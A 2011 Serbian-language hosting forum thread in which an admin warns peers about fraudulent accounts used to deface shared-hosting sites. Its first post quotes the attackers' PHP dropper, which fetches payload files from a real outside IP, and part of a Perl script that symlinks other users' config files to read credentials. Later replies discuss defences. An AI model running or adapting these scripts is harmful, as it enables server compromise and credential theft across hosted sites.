Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

"Profesionalni albanski hakeri"

elitemadzone.org :: MadZone :: "Profesionalni albanski hakeri"

Strane: 1 2 3 4 5 ... Dalje > >>

[ Pregleda: 57212 | Odgovora: 124 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.adsl-3.sezampro.rs.



+46 Profil

icon "Profesionalni albanski hakeri"08.08.2011. u 02:34 - pre 153 meseci
Evo moje prve teme nisam ih do sada pravio pa je pravi trenutak. Nasi dobri sugradjani sa juga Srbije imaju visak vremena i energije pa cesto "hakuju" sajtove. Neki dan je dosta sajtova hakovano koji su bili na veratu. Egipcani sa juga poceli su da koriste prvljave fazone nebi li mi mislili kako su oni "hakeri", dakle poceli su da kupuju hosting i time pribave pristup serveru, placanje vrse preko tudjeg naloga ( obicno ) i to u jutarnjim casovima, svima kojima sistem automatski aktivira uslugu dok oni spavaju moze da ih kosta poprilicno puno vremena kada se sutra probude.

Egipcani uploaduju neki blabla.php a u njemu se nalazi


<?php

$file = fopen(".htaccess" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/htaccess.txt');
$write = fwrite ($file ,$sa);

$file = fopen("user.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/user.txt');
$write = fwrite ($file ,$sa);

$file = fopen("cgi.dz" ,"w+");
$sa=file_get_contents('http://184.154.67.66/~bustapro/tmp/cgi.txt');
$write = fwrite ($file ,$sa);

..... bla bla


fclose($file);
if ($write) {
echo "The File Was Created Successfuly";
}
else {echo"\"error\"";}
chmod("user.dz" , 0755);
chmod("user.dz" , 0755);
chmod("jeentel" , 0755);
chmod("dz.dz" , 0755);
chmod("config.dz" , 0755);

?>

Nadam se da svi kontaju sta ovaj fajl radi kada se pokrene. Potom pokren skinute fajlove primera radi


#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>[~] Cyb3r-DZ Config - [~] </title>
<style type="text/css">
.newStyle1 {
font-family: Tahoma;
font-size: x-small;
font-weight: bold;
color: #00FFFF;
text-align: center;
}
</style>
</head>
';
sub lil{
($user) = @_;
$msr = qx{pwd};
$kola=$msr."/".$user;
$kola=~s/\n//g;
symlink('/home/'.$user.'/public_html/includes/configure.php',$kola.'-shop.txt');
symlink('/home/'.$user.'/public_html/amember/config.inc.php',$kola.'-amember.txt');
symlink('/home/'.$user.'/public_html/config.inc.php',$kola.'-amember2.txt');
symlink('/home/'.$user.'/public_html/members/configuration.php',$kola.'-members.txt');
symlink('/home/'.$user.'/public_html/config.php',$kola.'2.txt');
symlink('/home/'.$user.'/public_html/forum/includes/config.php',$kola.'-forum.txt');
symlink('/home/'.$user.'/public_html/admin/conf.php',$kola.'5.txt');
symlink('/home/'.$user.'/public_html/admin/config.php',$kola.'4.txt');
symlink('/home/'.$user.'/public_html/wp-config.php',$kola.'-wp13.txt');
symlink('/home/'.$user.'/public_html/blog/wp-config.php',$kola.'-wp-blog.txt');
symlink('/home/'.$user.'/public_html/conf_global.php',$kola.'6.txt');
symlink('/home/'.$user.'/public_html/include/db.php',$kola.'7.txt');
symlink('/home/'.$user.'/public_html/connect.php',$kola.'8.txt');

... bla bla something..

I urade deface na hrpu sajtova.

Ovakav problem zahteva sistemsko resenje pocev od servera. Ajmo admini dajte neke dobre predloge :)
Dakle ovo je samo administratorima da obrate paznju , ne korisnicima. Verovatno ovaj forum cita dosta ljudi ( nadam se i iz Verat-a, Eunet-a, Orion-a itd ) nemojte da nas prave blesavim ovakvi kvazi hakeri.

Generalno resenje za ove lazne porudzbe bi bila neka provera, najverodosnija je SMS potvrda porudzbe. Napisacu dodatak za poznati sistem za korisnike WHMCS koji ce preko clickatell-a slati neki random kod koji ce trebati da se unese posle porucivanja kako bi porudzba bila aktivna pa cu ga podeliti ovde a svi koji zele dalje da ga koriste moci ce gde god uspu da ga uglave.

Toliko za sada
Good night.
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

acko018
Nis

Član broj: 62444
Poruke: 118
*.dynamic.isp.telekom.rs.

ICQ: 291731897
Sajt: www.hostingsrbija.com


+4 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 02:42 - pre 153 meseci
1) blokirati ip adresu preko firewall-a
2) evo vam maxmind promo kod za whmcs http://www.maxmind.com/app/ccfd_promo?promo=WHMCS4562
preko njega se moze aktivirati besplatno maxmind anti fraud sistem koji ce odmah oznaciti laznu transakciju i nece dozvoliti placanje.

Hvala Darklord
http://www.hostingsrbija.com | web hosting | audio streaming | shell hosting | ircd hosting | VPS hosting
 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.static.isp.telekom.rs.



+46 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 07:23 - pre 153 meseci
Sobzirom na dosta ovakvih stvari sa juga Srbije ja sam blokirao pola njihove mreze u whmcs. MaxMind ponekad smara svi znamo kako on radi i njegov metod upita u podatke o IP adresi i uporedjivanje sa korisnikom je suludo ( ovo je jedan od losih ( glupljih ) ) provera ovog software-a.

Ok jedno resenje je free 1000 provera mesecno, ima neki whmcs kupon pratite link u Setup - Fraud Setup
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

Predrag Supurovic
Pedja YT9TP
Užice

Član broj: 157129
Poruke: 6274

Sajt: pedja.supurovic.net


+1570 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 07:50 - pre 153 meseci
Mnogo ti je jednostavnije da promeniš hosting. Verat je otkad postoji bušan i svako malo ga neko ovako rasturi.
 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.static.isp.telekom.rs.



+46 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 08:00 - pre 153 meseci
Izgleda nisi citao o cemu se radi vec si procitao zadnju liniju pa odgovorio na nju :) ne radi se o Veratu
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
*.dynamic.isp.telekom.rs.



+37 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 08:49 - pre 153 meseci
Nema tu pomoci... Neki od pomenutih servera jos vrte php 4.x.x ... Nece ljudi da urade upgrade servisa php,mysql,apache itd... Hiljade sajtova ce biti nedostupno dok se ne uradi upgrade,to je par minuta,ali... Dok se server ne zakrpi,ne vredi pricati uopste o joomli,wp=u,drupalu itd...
 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.static.isp.telekom.rs.



+46 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:01 - pre 153 meseci
Ocigledno ne razumete, ne radi se o nijednom napomenutom servisu. Ovo je samo upozorenje sistem administratorima. Druga stavka ako imate dobru ideju kako smanjtii rizik podelite ako nemate neku pametnu misao onda se samo zadrzite u ulozi citaca.
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
*.dynamic.sbb.rs.

Sajt: angelstudio.org


+392 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:07 - pre 153 meseci
Mnogo dobro razumemo.

Zašto su uopšte Albanci krivi, a nisu admini koji ne rade svoj posao već teraju bušne servise na serverima? Pusti ti Albance, nemaju oni ništa sa tim što su domaći hostovi bušni, i tražiti krivca u njima je spinovanje.
 
Odgovor na temu

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
*.dynamic.isp.telekom.rs.



+37 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:09 - pre 153 meseci
Upload fajlova je problem,napadac uploaduje shell ili nesto slicno kao iz tvog posta i onda pravi harakiri na serveru. Procitaj malo sta je RFI napad,bice ti sve jasnije.
 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
*.dynamic.sbb.rs.

Sajt: angelstudio.org


+392 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:14 - pre 153 meseci
A može li da se isključi remote file inclusion? Može. Pa ko je kriv onda?
 
Odgovor na temu

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
*.dynamic.isp.telekom.rs.



+37 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:14 - pre 153 meseci
Takodje,pola tih "administratora" ne zna sta je mod security, preko njega mogu da blokiraju te shell scripte tipa c99shell,r57shell,sniper itd...

I naravno disable functions kao sto su shell_exec,exec itd...

 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.static.isp.telekom.rs.



+46 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:43 - pre 153 meseci
Ako ste primetili ona php skripta sluzi samo za skidanje potrebnih stvari to ne moze da se zabrani, pogledajte druge skripte. Kakve veze mod_security ima sa ovim kada se ovo ne vrti kroz apache ?

suPHP nece pomoci :) napadac ne pokrece php skriptu i time pravi haos. Znaci php skroz zaobidjite :) a tu se podrazumeva i apache i dodatni moduli. Tako da tvoj komentar pola tih "administratora" bitno da si ih stavio pod navodnike ne zna sta je mod_security ( ne znam da li ti je ovo bio zakljucak za ovo situaciju ili inace.. ) posto si dao pogresnu dijagnozu. Sto bi tebe onda trebalo staviti u navodnike sobzirom da si skroz promasio stvar? :)
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
*.dynamic.isp.telekom.rs.



+37 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:46 - pre 153 meseci
Pricam generalno.
 
Odgovor na temu

Danilo Cvjeticanin
Danilo Cvjeticanin
Apatin-Beograd

Član broj: 9614
Poruke: 3517
*.dynamic.isp.telekom.rs.



+37 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:53 - pre 153 meseci
Apache+mod security moze da resi problem. E sad,postoji mnogo kombinacija...

Takodje i rootkit hunter nije losa stvar,kada se namesti da svaki dan salje izvestaj na email... Najbolje na svakih 6 sati...
 
Odgovor na temu

Miroslav Ćurčić
ex mVeliki
Novi Sad

Miroslav Ćurčić
Član broj: 19034
Poruke: 1118
*.adsl.eunet.rs.



+19 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:57 - pre 153 meseci
Na site5.com sam video zanimljivo rešenje (mislim da se to zove "chroot" možda grešim) kojim se sajt izvršava u svojstvu svog usera, čime dobijamo da je vlasnik datoteka koje kreira PHP isti kao i FTP user. Na taj način napadač ne može uraditi overwrite datoteka unutar drugih sajtova na tom shared hostingu.
"The quieter you become, the more you are able to hear."
Blog | PowerCMS
 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.static.isp.telekom.rs.



+46 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 09:58 - pre 153 meseci
Za 6 sati "haker" je mogao da zameni vec hrpu fajlova na serveru.

Par tips
1) Pozeljno raditi upgrade software-a ( kernel se podrazumeva )
2) Twiknuti php.ini
3) Ograniciti pristup perl-u
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
*.dynamic.sbb.rs.

Sajt: angelstudio.org


+392 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 10:02 - pre 153 meseci
A zabrana pristupa samom htaccess-u sa localhosta, hoće li to rešiti stvar?

Ako iko ima pristup htaccess-u nije uopšte bitno ima li ili nema perl, može da defacuje statičkom html.
 
Odgovor na temu

nkrgovic
Nikola Krgović
Beograd

Član broj: 3534
Poruke: 2807

ICQ: 49345867
Sajt: https://www.twinstarsyste..


+655 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 10:05 - pre 153 meseci
Ti hunteri i slicno su, po meni, lose resenje. To je samo da znas da VEC imas problem, a ne sprecavanje. Redovno odrzavan server, svez stable (ne najnoviji, vec malo stariji, ali jos uvek stable i odrzavani - ali ne ni bajati) softver, apache, php, mysql su osnova. Dodati mod_security je odlicno ako moze, ali onda imas problem koji imas i sa konzervativno namestenim setovanjima za php.ini : zale se korisnici. Naravno, treba imati i neki IDS/IPS, redovono odrzavane sve pakete... sve redom.

Realno, jako dobro zatarabljen server moze da resi mnogo toga, ali ne sve - cinjenica je da shared hosting uvek moze da se busi od strane korisnika, posebno ako se potrude i ako ZNAJU sta rade. Ne neki klinci sa skriptama, vec neko stariji, iskusan i odlucan, to moze uvek da resi. Jedino resenje za to je screening korisnika. S'druge strane jako tight security odbija korisnike, jer im mnogo toga ne radi... pocev od gotovih CMS-ova, pa do "custom" resenja pisanih nogama....

Idealno? Bataliti shared hosting. To je OK za neke primene, ali tih je sve manje... Za sve kojima treba aktivan sajt, baza i sl. - ima jako povoljnih VPS-ova.

P.S. Neko je spomenuo chroot. To nije lose, ali je na korak do VPS-a, pa onda, nekako, meni VPS deluje bolje. Naravno, ako mora shared, chroot se podrazumeva.
Please do not feed the Trolls!

Blasphemy? How can I blaspheme? I'm a god!'
 
Odgovor na temu

Darklord
Linux System Administrator
Subotica

Član broj: 30588
Poruke: 559
*.static.isp.telekom.rs.



+46 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 10:06 - pre 153 meseci
To je suPHP ne chroot "chroot" je druga stavka napadac izvrsi izmenu preko perl skripte koja neki nacin prati symlinkove fajlova koji nisu od tog korisnika ( strange ) ok ne znam sta bi se desilo da je "haker" pokrenuo te skripte ja sam generalno dobio poruku sa sumljivom narudzbom i uhvatio sam ga dok je jos uploadovao stvari. Ne znam kako bi se na mom sistemu ovo odrazilo ali vidim da je na mnogima ostavilo tragove ( verujem da su koristili suPHP ) ako nisu that is stupid.
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------
 
Odgovor na temu

bojan_bozovic

Član broj: 29028
Poruke: 3292
*.dynamic.sbb.rs.

Sajt: angelstudio.org


+392 Profil

icon Re: "Profesionalni albanski hakeri"08.08.2011. u 10:09 - pre 153 meseci
Ma moraš sprečiti pristup .htaccesu iz svih skripti, tako da samo preko FTP može da se promeni! Inače imaš jednostavnu redirekciju na example.com/defaced.html
 
Odgovor na temu

elitemadzone.org :: MadZone :: "Profesionalni albanski hakeri"

Strane: 1 2 3 4 5 ... Dalje > >>

[ Pregleda: 57212 | Odgovora: 124 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.